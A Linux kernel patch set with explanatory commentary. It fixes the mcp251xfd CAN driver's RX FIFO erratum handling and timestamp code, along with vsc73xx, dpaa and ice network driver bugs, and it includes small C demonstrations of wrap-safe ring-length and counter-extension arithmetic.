+@@ -97,7 +97,16 @@ void can_ram_get_layout(struct can_ram_layout *layout,
+ 	if (ring) {
+ 		u8 num_rx_coalesce = 0, num_tx_coalesce = 0;
+ 
+-		num_rx = can_ram_rounddown_pow_of_two(config, &config->rx, 0, ring->rx_pending);
++		/* If the ring parameters have been configured in
++		 * CAN-CC mode, but we are in CAN-FD mode now, they
++		 * might be too big. Use the default CAN-FD values
++		 * in this case.
++		 */
++		num_rx = ring->rx_pending;
++		if (num_rx > layout->max_rx)
++			num_rx = layout->default_rx;
++
++		num_rx = can_ram_rounddown_pow_of_two(config, &config->rx, 0, num_rx);
+ 
+ 		/* The ethtool doc says:
+ 		 * To disable coalescing, set usecs = 0 and max_frames = 1.
+diff --git a/drivers/net/can/spi/mcp251xfd/mcp251xfd-ring.c b/drivers/net/can/spi/mcp251xfd/mcp251xfd-ring.c
+index 4d0246a0779a6..0fde8154a649b 100644
+--- a/drivers/net/can/spi/mcp251xfd/mcp251xfd-ring.c
++++ b/drivers/net/can/spi/mcp251xfd/mcp251xfd-ring.c
+@@ -196,6 +196,7 @@ mcp251xfd_ring_init_rx(struct mcp251xfd_priv *priv, u16 *base, u8 *fifo_nr)
+ 	int i, j;
+ 
+ 	mcp251xfd_for_each_rx_ring(priv, rx_ring, i) {
++		rx_ring->last_valid = timecounter_read(&priv->tc);
+ 		rx_ring->head = 0;
+ 		rx_ring->tail = 0;
+ 		rx_ring->base = *base;
+@@ -458,11 +459,25 @@ int mcp251xfd_ring_alloc(struct mcp251xfd_priv *priv)
+ 
+ 	/* switching from CAN-2.0 to CAN-FD mode or vice versa */
+ 	if (fd_mode != test_bit(MCP251XFD_FLAGS_FD_MODE, priv->flags)) {
++		const struct ethtool_ringparam ring = {
++			.rx_pending = priv->rx_obj_num,
++			.tx_pending = priv->tx->obj_num,
++		};
++		const struct ethtool_coalesce ec = {
++			.rx_coalesce_usecs_irq = priv->rx_coalesce_usecs_irq,
++			.rx_max_coalesced_frames_irq = priv->rx_obj_num_coalesce_irq,
++			.tx_coalesce_usecs_irq = priv->tx_coalesce_usecs_irq,
++			.tx_max_coalesced_frames_irq = priv->tx_obj_num_coalesce_irq,
++		};
+ 		struct can_ram_layout layout;
+ 
+-		can_ram_get_layout(&layout, &mcp251xfd_ram_config, NULL, NULL, fd_mode);
+-		priv->rx_obj_num = layout.default_rx;
+-		tx_ring->obj_num = layout.default_tx;
++		can_ram_get_layout(&layout, &mcp251xfd_ram_config, &ring, &ec, fd_mode);
++
++		priv->rx_obj_num = layout.cur_rx;
++		priv->rx_obj_num_coalesce_irq = layout.rx_coalesce;
++
++		tx_ring->obj_num = layout.cur_tx;
++		priv->tx_obj_num_coalesce_irq = layout.tx_coalesce;
+ 	}
+ 
+ 	if (fd_mode) {
+@@ -499,6 +514,8 @@ int mcp251xfd_ring_alloc(struct mcp251xfd_priv *priv)
+ 		}
+ 
+ 		rx_ring->obj_num = rx_obj_num;
++		rx_ring->obj_num_shift_to_u8 = BITS_PER_TYPE(rx_ring->obj_num_shift_to_u8) -
++			ilog2(rx_obj_num);
+ 		rx_ring->obj_size = rx_obj_size;
+ 		priv->rx[i] = rx_ring;
+ 	}
+diff --git a/drivers/net/can/spi/mcp251xfd/mcp251xfd-rx.c b/drivers/net/can/spi/mcp251xfd/mcp251xfd-rx.c
+index ced8d9c81f8c6..fe897f3e4c12a 100644
+--- a/drivers/net/can/spi/mcp251xfd/mcp251xfd-rx.c
++++ b/drivers/net/can/spi/mcp251xfd/mcp251xfd-rx.c
+@@ -2,7 +2,7 @@
+ //
+ // mcp251xfd - Microchip MCP251xFD Family CAN controller driver
+ //
+-// Copyright (c) 2019, 2020, 2021 Pengutronix,
++// Copyright (c) 2019, 2020, 2021, 2023 Pengutronix,
+ //               Marc Kleine-Budde <kernel@pengutronix.de>
+ //
+ // Based on:
+@@ -16,23 +16,14 @@
+ 
+ #include "mcp251xfd.h"
+ 
+-static inline int
+-mcp251xfd_rx_head_get_from_chip(const struct mcp251xfd_priv *priv,
+-				const struct mcp251xfd_rx_ring *ring,
+-				u8 *rx_head, bool *fifo_empty)
++static inline bool mcp251xfd_rx_fifo_sta_empty(const u32 fifo_sta)
+ {
+-	u32 fifo_sta;
+-	int err;
+-
+-	err = regmap_read(priv->map_reg, MCP251XFD_REG_FIFOSTA(ring->fifo_nr),
+-			  &fifo_sta);
+-	if (err)
+-		return err;
+-
+-	*rx_head = FIELD_GET(MCP251XFD_REG_FIFOSTA_FIFOCI_MASK, fifo_sta);
+-	*fifo_empty = !(fifo_sta & MCP251XFD_REG_FIFOSTA_TFNRFNIF);
++	return !(fifo_sta & MCP251XFD_REG_FIFOSTA_TFNRFNIF);
++}
+ 
+-	return 0;
++static inline bool mcp251xfd_rx_fifo_sta_full(const u32 fifo_sta)
++{
++	return fifo_sta & MCP251XFD_REG_FIFOSTA_TFERFFIF;
+ }
+ 
+ static inline int
+@@ -80,29 +71,49 @@ mcp251xfd_check_rx_tail(const struct mcp251xfd_priv *priv,
+ }
+ 
+ static int
+-mcp251xfd_rx_ring_update(const struct mcp251xfd_priv *priv,
+-			 struct mcp251xfd_rx_ring *ring)
++mcp251xfd_get_rx_len(const struct mcp251xfd_priv *priv,
++		     const struct mcp251xfd_rx_ring *ring,
++		     u8 *len_p)
+ {
+-	u32 new_head;
+-	u8 chip_rx_head;
+-	bool fifo_empty;
++	const u8 shift = ring->obj_num_shift_to_u8;
++	u8 chip_head, tail, len;
++	u32 fifo_sta;
+ 	int err;
+ 
+-	err = mcp251xfd_rx_head_get_from_chip(priv, ring, &chip_rx_head,
+-					      &fifo_empty);
+-	if (err || fifo_empty)
++	err = regmap_read(priv->map_reg, MCP251XFD_REG_FIFOSTA(ring->fifo_nr),
++			  &fifo_sta);
++	if (err)
++		return err;
++
++	if (mcp251xfd_rx_fifo_sta_empty(fifo_sta)) {
++		*len_p = 0;
++		return 0;
++	}
++
++	if (mcp251xfd_rx_fifo_sta_full(fifo_sta)) {
++		*len_p = ring->obj_num;
++		return 0;
++	}
++
++	chip_head = FIELD_GET(MCP251XFD_REG_FIFOSTA_FIFOCI_MASK, fifo_sta);
++
++	err =  mcp251xfd_check_rx_tail(priv, ring);
++	if (err)
+ 		return err;
++	tail = mcp251xfd_get_rx_tail(ring);
+ 
+-	/* chip_rx_head, is the next RX-Object filled by the HW.
+-	 * The new RX head must be >= the old head.
++	/* First shift to a full u8. The subtraction then wraps at
++	 * the u8 boundary, which keeps the difference correct across
++	 * the counter overflow. The right shift acts on len, a u8.
+ 	 */
+-	new_head = round_down(ring->head, ring->obj_num) + chip_rx_head;
+-	if (new_head <= ring->head)
+-		new_head += ring->obj_num;
++	BUILD_BUG_ON(sizeof(ring->obj_num) != sizeof(chip_head));
++	BUILD_BUG_ON(sizeof(ring->obj_num) != sizeof(tail));
++	BUILD_BUG_ON(sizeof(ring->obj_num) != sizeof(len));
+ 
+-	ring->head = new_head;
++	len = (chip_head << shift) - (tail << shift);
++	*len_p = len >> shift;
+ 
+-	return mcp251xfd_check_rx_tail(priv, ring);
++	return 0;
+ }
+ 
+ static void
+@@ -148,8 +159,6 @@ mcp251xfd_hw_rx_obj_to_skb(const struct mcp251xfd_priv *priv,
+ 
+ 	if (!(hw_rx_obj->flags & MCP251XFD_OBJ_FLAGS_RTR))
+ 		memcpy(cfd->data, hw_rx_obj->data, cfd->len);
+-
+-	mcp251xfd_skb_set_timestamp(priv, skb, hw_rx_obj->ts);
+ }
+ 
+ static int
+@@ -160,8 +169,26 @@ mcp251xfd_handle_rxif_one(struct mcp251xfd_priv *priv,
+ 	struct net_device_stats *stats = &priv->ndev->stats;
+ 	struct sk_buff *skb;
+ 	struct canfd_frame *cfd;
++	u64 timestamp;
+ 	int err;
+ 
++	/* According to mcp2518fd erratum DS80000789E 6., the FIFOCI
++	 * bits of the FIFOSTA register, i.e. the RX FIFO head index,
++	 * might be corrupted, and we might process past the RX FIFO's
++	 * head into old CAN frames.
++	 *
++	 * Compare the timestamp of currently processed CAN frame with
++	 * last valid frame received. Abort with -EBADMSG if an old
++	 * CAN frame is detected.
++	 */
++	timestamp = timecounter_cyc2time(&priv->tc, hw_rx_obj->ts);
++	if (timestamp <= ring->last_valid) {
++		stats->rx_fifo_errors++;
++
++		return -EBADMSG;
++	}
++	ring->last_valid = timestamp;
++
+ 	if (hw_rx_obj->flags & MCP251XFD_OBJ_FLAGS_FDF)
+ 		skb = alloc_canfd_skb(priv->ndev, &cfd);
+ 	else
+@@ -172,6 +199,7 @@ mcp251xfd_handle_rxif_one(struct mcp251xfd_priv *priv,
+ 		return 0;
+ 	}
+ 
++	mcp251xfd_skb_set_timestamp(skb, timestamp);
+ 	mcp251xfd_hw_rx_obj_to_skb(priv, hw_rx_obj, skb);
+ 	err = can_rx_offload_queue_timestamp(&priv->offload, skb, hw_rx_obj->ts);
+ 	if (err)
+@@ -197,52 +225,81 @@ mcp251xfd_rx_obj_read(const struct mcp251xfd_priv *priv,
+ 	return err;
+ }
+ 
++static int
++mcp251xfd_handle_rxif_ring_uinc(const struct mcp251xfd_priv *priv,
++				struct mcp251xfd_rx_ring *ring,
++				u8 len)
++{
++	int offset;
++	int err;
++
++	if (!len)
++		return 0;
++
++	ring->head += len;
++
++	/* Increment the RX FIFO tail pointer 'len' times in a
++	 * single SPI message.
++	 *
++	 * Note:
++	 * Calculate offset, so that the SPI transfer ends on
++	 * the last message of the uinc_xfer array, which has
++	 * "cs_change == 0", to properly deactivate the chip
++	 * select.
++	 */
++	offset = ARRAY_SIZE(ring->uinc_xfer) - len;
++	err = spi_sync_transfer(priv->spi,
++				ring->uinc_xfer + offset, len);
++	if (err)
++		return err;
++
++	ring->tail += len;
++
++	return 0;
++}
++
+ static int
+ mcp251xfd_handle_rxif_ring(struct mcp251xfd_priv *priv,
+ 			   struct mcp251xfd_rx_ring *ring)
+ {
+ 	struct mcp251xfd_hw_rx_obj_canfd *hw_rx_obj = ring->obj;
+-	u8 rx_tail, len;
++	u8 rx_tail, len, l;
+ 	int err, i;
+ 
+-	err = mcp251xfd_rx_ring_update(priv, ring);
++	err = mcp251xfd_get_rx_len(priv, ring, &len);
+ 	if (err)
+ 		return err;
+ 
+-	while ((len = mcp251xfd_get_rx_linear_len(ring))) {
+-		int offset;
+-
++	while ((l = mcp251xfd_get_rx_linear_len(ring, len))) {
+ 		rx_tail = mcp251xfd_get_rx_tail(ring);
+ 
+ 		err = mcp251xfd_rx_obj_read(priv, ring, hw_rx_obj,
+-					    rx_tail, len);
++					    rx_tail, l);
+ 		if (err)
+ 			return err;
+ 
+-		for (i = 0; i < len; i++) {
++		for (i = 0; i < l; i++) {
+ 			err = mcp251xfd_handle_rxif_one(priv, ring,
+ 							(void *)hw_rx_obj +
+ 							i * ring->obj_size);
+-			if (err)
++
++			/* -EBADMSG means we're affected by mcp2518fd
++			 * erratum DS80000789E 6., i.e. the timestamp
++			 * in the RX object is older than the last
++			 * valid received CAN frame. Don't process any
++			 * further and mark processed frames as good.
++			 */
++			if (err == -EBADMSG)
++				return mcp251xfd_handle_rxif_ring_uinc(priv, ring, i);
++			else if (err)
+ 				return err;
+ 		}
+ 
+-		/* Increment the RX FIFO tail pointer 'len' times in a
+-		 * single SPI message.
+-		 *
+-		 * Note:
+-		 * Calculate offset, so that the SPI transfer ends on
+-		 * the last message of the uinc_xfer array, which has
+-		 * "cs_change == 0", to properly deactivate the chip
+-		 * select.
+-		 */
+-		offset = ARRAY_SIZE(ring->uinc_xfer) - len;
+-		err = spi_sync_transfer(priv->spi,
+-					ring->uinc_xfer + offset, len);
++		err = mcp251xfd_handle_rxif_ring_uinc(priv, ring, l);
+ 		if (err)
+ 			return err;
+ 
+-		ring->tail += len;
++		len -= l;
+ 	}
+ 
+ 	return 0;
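
The new length computation depends on the ring size being a power of two no larger than 256 (which the BUILD_BUG_ONs and the ilog2-based shift enforce): shifting head and tail up until the ring index fills the whole u8 makes the subtraction wrap at exactly the ring boundary, so the occupancy stays correct across counter overflow. A compact demonstration of the trick for a 16-entry ring:

#include <assert.h>
#include <stdint.h>

/* Ring with obj_num = 16 objects: shift = 8 - log2(16) = 4, so the
 * 4-bit ring index is stretched to fill the full u8 before subtracting.
 */
#define OBJ_NUM 16u
#define SHIFT   4u

static uint8_t ring_len(uint8_t head, uint8_t tail)
{
	/* u8 arithmetic wraps mod 256; after the shift, that is
	 * exactly mod OBJ_NUM in the upper bits.
	 */
	uint8_t len = (uint8_t)((uint8_t)(head << SHIFT) - (uint8_t)(tail << SHIFT));

	return len >> SHIFT;
}

int main(void)
{
	/* Straightforward case: head ahead of tail. */
	assert(ring_len(5, 2) == 3);

	/* Head has wrapped past the ring boundary: from index 14 to
	 * index 2 is still 4 objects, thanks to the modular arithmetic.
	 */
	assert(ring_len(2, 14) == 4);
	return 0;
}
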
+diff --git a/drivers/net/can/spi/mcp251xfd/mcp251xfd-tef.c b/drivers/net/can/spi/mcp251xfd/mcp251xfd-tef.c
+index 902eb767426d1..8f39730f3122e 100644
+--- a/drivers/net/can/spi/mcp251xfd/mcp251xfd-tef.c
++++ b/drivers/net/can/spi/mcp251xfd/mcp251xfd-tef.c
+@@ -97,7 +97,7 @@ mcp251xfd_handle_tefif_one(struct mcp251xfd_priv *priv,
+ 	tef_tail = mcp251xfd_get_tef_tail(priv);
+ 	skb = priv->can.echo_skb[tef_tail];
+ 	if (skb)
+-		mcp251xfd_skb_set_timestamp(priv, skb, hw_tef_obj->ts);
++		mcp251xfd_skb_set_timestamp_raw(priv, skb, hw_tef_obj->ts);
+ 	stats->tx_bytes +=
+ 		can_rx_offload_get_echo_skb(&priv->offload,
+ 					    tef_tail, hw_tef_obj->ts,
+diff --git a/drivers/net/can/spi/mcp251xfd/mcp251xfd-timestamp.c b/drivers/net/can/spi/mcp251xfd/mcp251xfd-timestamp.c
+index 712e091869870..1db99aabe85c5 100644
+--- a/drivers/net/can/spi/mcp251xfd/mcp251xfd-timestamp.c
++++ b/drivers/net/can/spi/mcp251xfd/mcp251xfd-timestamp.c
+@@ -2,7 +2,7 @@
+ //
+ // mcp251xfd - Microchip MCP251xFD Family CAN controller driver
+ //
+-// Copyright (c) 2021 Pengutronix,
++// Copyright (c) 2021, 2023 Pengutronix,
+ //               Marc Kleine-Budde <kernel@pengutronix.de>
+ //
+ 
+@@ -11,20 +11,20 @@
+ 
+ #include "mcp251xfd.h"
+ 
+-static u64 mcp251xfd_timestamp_read(const struct cyclecounter *cc)
++static u64 mcp251xfd_timestamp_raw_read(const struct cyclecounter *cc)
+ {
+ 	const struct mcp251xfd_priv *priv;
+-	u32 timestamp = 0;
++	u32 ts_raw = 0;
+ 	int err;
+ 
+ 	priv = container_of(cc, struct mcp251xfd_priv, cc);
+-	err = mcp251xfd_get_timestamp(priv, &timestamp);
++	err = mcp251xfd_get_timestamp_raw(priv, &ts_raw);
+ 	if (err)
+ 		netdev_err(priv->ndev,
+ 			   "Error %d while reading timestamp. HW timestamps may be inaccurate.",
+ 			   err);
+ 
+-	return timestamp;
++	return ts_raw;
+ }
+ 
+ static void mcp251xfd_timestamp_work(struct work_struct *work)
+@@ -39,21 +39,11 @@ static void mcp251xfd_timestamp_work(struct work_struct *work)
+ 			      MCP251XFD_TIMESTAMP_WORK_DELAY_SEC * HZ);
+ }
+ 
+-void mcp251xfd_skb_set_timestamp(const struct mcp251xfd_priv *priv,
+-				 struct sk_buff *skb, u32 timestamp)
+-{
+-	struct skb_shared_hwtstamps *hwtstamps = skb_hwtstamps(skb);
+-	u64 ns;
+-
+-	ns = timecounter_cyc2time(&priv->tc, timestamp);
+-	hwtstamps->hwtstamp = ns_to_ktime(ns);
+-}
+-
+ void mcp251xfd_timestamp_init(struct mcp251xfd_priv *priv)
+ {
+ 	struct cyclecounter *cc = &priv->cc;
+ 
+-	cc->read = mcp251xfd_timestamp_read;
++	cc->read = mcp251xfd_timestamp_raw_read;
+ 	cc->mask = CYCLECOUNTER_MASK(32);
+ 	cc->shift = 1;
+ 	cc->mult = clocksource_hz2mult(priv->can.clock.freq, cc->shift);
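
The rename makes explicit that the TBC register only yields a raw, wrapping 32-bit cycle count; the kernel's cyclecounter/timecounter layer, refreshed by the periodic worker above, extends it into a monotonic 64-bit value before conversion to nanoseconds. The core idea of extending a wrapping counter, sketched in plain C as a simplified stand-in for the timecounter API:

#include <stdint.h>
#include <stdio.h>

/* Minimal stand-in for the kernel's timecounter: remember the last raw
 * sample and accumulate the wrap-safe deltas into a 64-bit total. This
 * must be called at least once per counter wrap period, which is what
 * the driver's periodic worker guarantees.
 */
struct tc {
	uint32_t last_raw;
	uint64_t total;		/* extended cycle count */
};

static uint64_t tc_read(struct tc *tc, uint32_t raw)
{
	uint32_t delta = raw - tc->last_raw;	/* wraps correctly mod 2^32 */

	tc->last_raw = raw;
	tc->total += delta;
	return tc->total;	/* scale by ns-per-cycle to get a timestamp */
}

int main(void)
{
	struct tc tc = { .last_raw = 0xfffffff0u, .total = 0xfffffff0u };

	/* Raw counter wrapped from 0xfffffff0 to 0x10: 0x20 cycles elapsed. */
	printf("extended = 0x%llx\n", (unsigned long long)tc_read(&tc, 0x10));
	return 0;
}
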
+diff --git a/drivers/net/can/spi/mcp251xfd/mcp251xfd.h b/drivers/net/can/spi/mcp251xfd/mcp251xfd.h
+index 78d12dda08a05..c07300443c6a3 100644
+--- a/drivers/net/can/spi/mcp251xfd/mcp251xfd.h
++++ b/drivers/net/can/spi/mcp251xfd/mcp251xfd.h
+@@ -2,7 +2,7 @@
+  *
+  * mcp251xfd - Microchip MCP251xFD Family CAN controller driver
+  *
+- * Copyright (c) 2019, 2020, 2021 Pengutronix,
++ * Copyright (c) 2019, 2020, 2021, 2023 Pengutronix,
+  *               Marc Kleine-Budde <kernel@pengutronix.de>
+  * Copyright (c) 2019 Martin Sperl <kernel@martin.sperl.org>
+  */
+@@ -549,10 +549,14 @@ struct mcp251xfd_rx_ring {
+ 	unsigned int head;
+ 	unsigned int tail;
+ 
++	/* timestamp of the last valid received CAN frame */
++	u64 last_valid;
++
+ 	u16 base;
+ 	u8 nr;
+ 	u8 fifo_nr;
+ 	u8 obj_num;
++	u8 obj_num_shift_to_u8;
+ 	u8 obj_size;
+ 
+ 	union mcp251xfd_write_reg_buf irq_enable_buf;
+@@ -793,10 +797,27 @@ mcp251xfd_spi_cmd_write(const struct mcp251xfd_priv *priv,
+ 	return data;
+ }
+ 
+-static inline int mcp251xfd_get_timestamp(const struct mcp251xfd_priv *priv,
+-					  u32 *timestamp)
++static inline int mcp251xfd_get_timestamp_raw(const struct mcp251xfd_priv *priv,
++					      u32 *ts_raw)
++{
++	return regmap_read(priv->map_reg, MCP251XFD_REG_TBC, ts_raw);
++}
++
++static inline void mcp251xfd_skb_set_timestamp(struct sk_buff *skb, u64 ns)
++{
++	struct skb_shared_hwtstamps *hwtstamps = skb_hwtstamps(skb);
++
++	hwtstamps->hwtstamp = ns_to_ktime(ns);
++}
++
++static inline
++void mcp251xfd_skb_set_timestamp_raw(const struct mcp251xfd_priv *priv,
++				     struct sk_buff *skb, u32 ts_raw)
+ {
+-	return regmap_read(priv->map_reg, MCP251XFD_REG_TBC, timestamp);
++	u64 ns;
++
++	ns = timecounter_cyc2time(&priv->tc, ts_raw);
++	mcp251xfd_skb_set_timestamp(skb, ns);
+ }
+ 
+ static inline u16 mcp251xfd_get_tef_obj_addr(u8 n)
+@@ -889,18 +910,9 @@ static inline u8 mcp251xfd_get_rx_tail(const struct mcp251xfd_rx_ring *ring)
+ 	return ring->tail & (ring->obj_num - 1);
+ }
+ 
+-static inline u8 mcp251xfd_get_rx_len(const struct mcp251xfd_rx_ring *ring)
+-{
+-	return ring->head - ring->tail;
+-}
+-
+ static inline u8
+-mcp251xfd_get_rx_linear_len(const struct mcp251xfd_rx_ring *ring)
++mcp251xfd_get_rx_linear_len(const struct mcp251xfd_rx_ring *ring, u8 len)
+ {
+-	u8 len;
+-
+-	len = mcp251xfd_get_rx_len(ring);
+-
+ 	return min_t(u8, len, ring->obj_num - mcp251xfd_get_rx_tail(ring));
+ }
+ 
+@@ -926,8 +938,6 @@ void mcp251xfd_ring_free(struct mcp251xfd_priv *priv);
+ int mcp251xfd_ring_alloc(struct mcp251xfd_priv *priv);
+ int mcp251xfd_handle_rxif(struct mcp251xfd_priv *priv);
+ int mcp251xfd_handle_tefif(struct mcp251xfd_priv *priv);
+-void mcp251xfd_skb_set_timestamp(const struct mcp251xfd_priv *priv,
+-				 struct sk_buff *skb, u32 timestamp);
+ void mcp251xfd_timestamp_init(struct mcp251xfd_priv *priv);
+ void mcp251xfd_timestamp_stop(struct mcp251xfd_priv *priv);
+ 
+diff --git a/drivers/net/dsa/vitesse-vsc73xx-core.c b/drivers/net/dsa/vitesse-vsc73xx-core.c
+index c8e9ca5d5c284..de444d201e0f8 100644
+--- a/drivers/net/dsa/vitesse-vsc73xx-core.c
++++ b/drivers/net/dsa/vitesse-vsc73xx-core.c
+@@ -35,7 +35,7 @@
+ #define VSC73XX_BLOCK_ANALYZER	0x2 /* Only subblock 0 */
+ #define VSC73XX_BLOCK_MII	0x3 /* Subblocks 0 and 1 */
+ #define VSC73XX_BLOCK_MEMINIT	0x3 /* Only subblock 2 */
+-#define VSC73XX_BLOCK_CAPTURE	0x4 /* Only subblock 2 */
++#define VSC73XX_BLOCK_CAPTURE	0x4 /* Subblocks 0-4, 6, 7 */
+ #define VSC73XX_BLOCK_ARBITER	0x5 /* Only subblock 0 */
+ #define VSC73XX_BLOCK_SYSTEM	0x7 /* Only subblock 0 */
+ 
+@@ -371,13 +371,19 @@ int vsc73xx_is_addr_valid(u8 block, u8 subblock)
+ 		break;
+ 
+ 	case VSC73XX_BLOCK_MII:
+-	case VSC73XX_BLOCK_CAPTURE:
+ 	case VSC73XX_BLOCK_ARBITER:
+ 		switch (subblock) {
+ 		case 0 ... 1:
+ 			return 1;
+ 		}
+ 		break;
++	case VSC73XX_BLOCK_CAPTURE:
++		switch (subblock) {
++		case 0 ... 4:
++		case 6 ... 7:
++			return 1;
++		}
++		break;
+ 	}
+ 
+ 	return 0;
+diff --git a/drivers/net/ethernet/freescale/dpaa/dpaa_eth.c b/drivers/net/ethernet/freescale/dpaa/dpaa_eth.c
+index 981cc32480474..19506f2be4d40 100644
+--- a/drivers/net/ethernet/freescale/dpaa/dpaa_eth.c
++++ b/drivers/net/ethernet/freescale/dpaa/dpaa_eth.c
+@@ -916,14 +916,18 @@ static inline void dpaa_setup_egress(const struct dpaa_priv *priv,
+ 	}
+ }
+ 
+-static void dpaa_fq_setup(struct dpaa_priv *priv,
+-			  const struct dpaa_fq_cbs *fq_cbs,
+-			  struct fman_port *tx_port)
++static int dpaa_fq_setup(struct dpaa_priv *priv,
++			 const struct dpaa_fq_cbs *fq_cbs,
++			 struct fman_port *tx_port)
+ {
+ 	int egress_cnt = 0, conf_cnt = 0, num_portals = 0, portal_cnt = 0, cpu;
+ 	const cpumask_t *affine_cpus = qman_affine_cpus();
+-	u16 channels[NR_CPUS];
+ 	struct dpaa_fq *fq;
++	u16 *channels;
++
++	channels = kcalloc(num_possible_cpus(), sizeof(u16), GFP_KERNEL);
++	if (!channels)
++		return -ENOMEM;
+ 
+ 	for_each_cpu_and(cpu, affine_cpus, cpu_online_mask)
+ 		channels[num_portals++] = qman_affine_channel(cpu);
+@@ -982,6 +986,10 @@ static void dpaa_fq_setup(struct dpaa_priv *priv,
+ 				break;
+ 		}
+ 	}
++
++	kfree(channels);
++
++	return 0;
+ }
+ 
+ static inline int dpaa_tx_fq_to_id(const struct dpaa_priv *priv,
+@@ -3454,7 +3462,9 @@ static int dpaa_eth_probe(struct platform_device *pdev)
+ 	 */
+ 	dpaa_eth_add_channel(priv->channel, &pdev->dev);
+ 
+-	dpaa_fq_setup(priv, &dpaa_fq_cbs, priv->mac_dev->port[TX]);
++	err = dpaa_fq_setup(priv, &dpaa_fq_cbs, priv->mac_dev->port[TX]);
++	if (err)
++		goto free_dpaa_bps;
+ 
+ 	/* Create a congestion group for this netdev, with
+ 	 * dynamically-allocated CGR ID.
+diff --git a/drivers/net/ethernet/freescale/dpaa/dpaa_ethtool.c b/drivers/net/ethernet/freescale/dpaa/dpaa_ethtool.c
+index 769e936a263c9..fcb0cba4611e1 100644
+--- a/drivers/net/ethernet/freescale/dpaa/dpaa_ethtool.c
++++ b/drivers/net/ethernet/freescale/dpaa/dpaa_ethtool.c
+@@ -515,12 +515,16 @@ static int dpaa_set_coalesce(struct net_device *dev,
+ 			     struct netlink_ext_ack *extack)
+ {
+ 	const cpumask_t *cpus = qman_affine_cpus();
+-	bool needs_revert[NR_CPUS] = {false};
+ 	struct qman_portal *portal;
+ 	u32 period, prev_period;
+ 	u8 thresh, prev_thresh;
++	bool *needs_revert;
+ 	int cpu, res;
+ 
++	needs_revert = kcalloc(num_possible_cpus(), sizeof(bool), GFP_KERNEL);
++	if (!needs_revert)
++		return -ENOMEM;
++
+ 	period = c->rx_coalesce_usecs;
+ 	thresh = c->rx_max_coalesced_frames;
+ 
+@@ -543,6 +547,8 @@ static int dpaa_set_coalesce(struct net_device *dev,
+ 		needs_revert[cpu] = true;
+ 	}
+ 
++	kfree(needs_revert);
++
+ 	return 0;
+ 
+ revert_values:
+@@ -556,6 +562,8 @@ static int dpaa_set_coalesce(struct net_device *dev,
+ 		qman_dqrr_set_ithresh(portal, prev_thresh);
+ 	}
+ 
++	kfree(needs_revert);
++
+ 	return res;
+ }
+ 
+diff --git a/drivers/net/ethernet/intel/ice/ice_main.c b/drivers/net/ethernet/intel/ice/ice_main.c
+index 9dbfbc90485e4..3f01942e4982d 100644
+--- a/drivers/net/ethernet/intel/ice/ice_main.c
++++ b/drivers/net/ethernet/intel/ice/ice_main.c
+@@ -611,6 +611,9 @@ ice_prepare_for_reset(struct ice_pf *pf, enum ice_reset_req reset_type)
+ 			memset(&vsi->mqprio_qopt, 0, sizeof(vsi->mqprio_qopt));
+ 		}
+ 	}
++
++	if (vsi->netdev)
++		netif_device_detach(vsi->netdev);
+ skip:
+ 
+ 	/* clear SW filtering DB */
+@@ -2630,11 +2633,11 @@ static void ice_vsi_assign_bpf_prog(struct ice_vsi *vsi, struct bpf_prog *prog)
+ 	int i;
+ 
+ 	old_prog = xchg(&vsi->xdp_prog, prog);
+-	if (old_prog)
+-		bpf_prog_put(old_prog);
+-
+ 	ice_for_each_rxq(vsi, i)
+ 		WRITE_ONCE(vsi->rx_rings[i]->xdp_prog, vsi->xdp_prog);
++
++	if (old_prog)
++		bpf_prog_put(old_prog);
+ }
+ 
+ /**
+@@ -2883,6 +2886,18 @@ int ice_vsi_determine_xdp_res(struct ice_vsi *vsi)
+ 	return 0;
+ }
+ 
++/**
++ * ice_max_xdp_frame_size - returns the maximum allowed frame size for XDP
++ * @vsi: Pointer to VSI structure
++ */
++static int ice_max_xdp_frame_size(struct ice_vsi *vsi)
++{
++	if (test_bit(ICE_FLAG_LEGACY_RX, vsi->back->flags))
++		return ICE_RXBUF_1664;
++	else
++		return ICE_RXBUF_3072;
++}
++
+ /**
+  * ice_xdp_setup_prog - Add or remove XDP eBPF program
+  * @vsi: VSI to setup XDP for
+@@ -2893,17 +2908,26 @@ static int
+ ice_xdp_setup_prog(struct ice_vsi *vsi, struct bpf_prog *prog,
+ 		   struct netlink_ext_ack *extack)
+ {
+-	int frame_size = vsi->netdev->mtu + ICE_ETH_PKT_HDR_PAD;
+-	bool if_running = netif_running(vsi->netdev);
++	unsigned int frame_size = vsi->netdev->mtu + ICE_ETH_PKT_HDR_PAD;
+ 	int ret = 0, xdp_ring_err = 0;
++	bool if_running;
+ 
+-	if (frame_size > vsi->rx_buf_len) {
++	if (frame_size > ice_max_xdp_frame_size(vsi)) {
+ 		NL_SET_ERR_MSG_MOD(extack, "MTU too large for loading XDP");
+ 		return -EOPNOTSUPP;
+ 	}
+ 
++	/* hot swap progs and avoid toggling link */
++	if (ice_is_xdp_ena_vsi(vsi) == !!prog) {
++		ice_vsi_assign_bpf_prog(vsi, prog);
++		return 0;
++	}
++
++	if_running = netif_running(vsi->netdev) &&
++		     !test_and_set_bit(ICE_VSI_DOWN, vsi->state);
++
+ 	/* need to stop netdev while setting up the program for Rx rings */
+-	if (if_running && !test_and_set_bit(ICE_VSI_DOWN, vsi->state)) {
++	if (if_running) {
+ 		ret = ice_down(vsi);
+ 		if (ret) {
+ 			NL_SET_ERR_MSG_MOD(extack, "Preparing device for XDP attach failed");
+@@ -2932,13 +2956,6 @@ ice_xdp_setup_prog(struct ice_vsi *vsi, struct bpf_prog *prog,
+ 		xdp_ring_err = ice_realloc_zc_buf(vsi, false);
+ 		if (xdp_ring_err)
+ 			NL_SET_ERR_MSG_MOD(extack, "Freeing XDP Rx resources failed");
+-	} else {
+-		/* safe to call even when prog == vsi->xdp_prog as
+-		 * dev_xdp_install in net/core/dev.c incremented prog's
+-		 * refcount so corresponding bpf_prog_put won't cause
+-		 * underflow
+-		 */
+-		ice_vsi_assign_bpf_prog(vsi, prog);
+ 	}
+ 
+ 	if (if_running)
+@@ -7140,6 +7157,7 @@ static void ice_update_pf_netdev_link(struct ice_pf *pf)
+  */
+ static void ice_rebuild(struct ice_pf *pf, enum ice_reset_req reset_type)
+ {
++	struct ice_vsi *vsi = ice_get_main_vsi(pf);
+ 	struct device *dev = ice_pf_to_dev(pf);
+ 	struct ice_hw *hw = &pf->hw;
+ 	bool dvm;
+@@ -7292,6 +7310,9 @@ static void ice_rebuild(struct ice_pf *pf, enum ice_reset_req reset_type)
+ 		ice_rebuild_arfs(pf);
+ 	}
+ 
++	if (vsi && vsi->netdev)
++		netif_device_attach(vsi->netdev);
++
+ 	ice_update_pf_netdev_link(pf);
+ 
+ 	/* tell the firmware we are up */
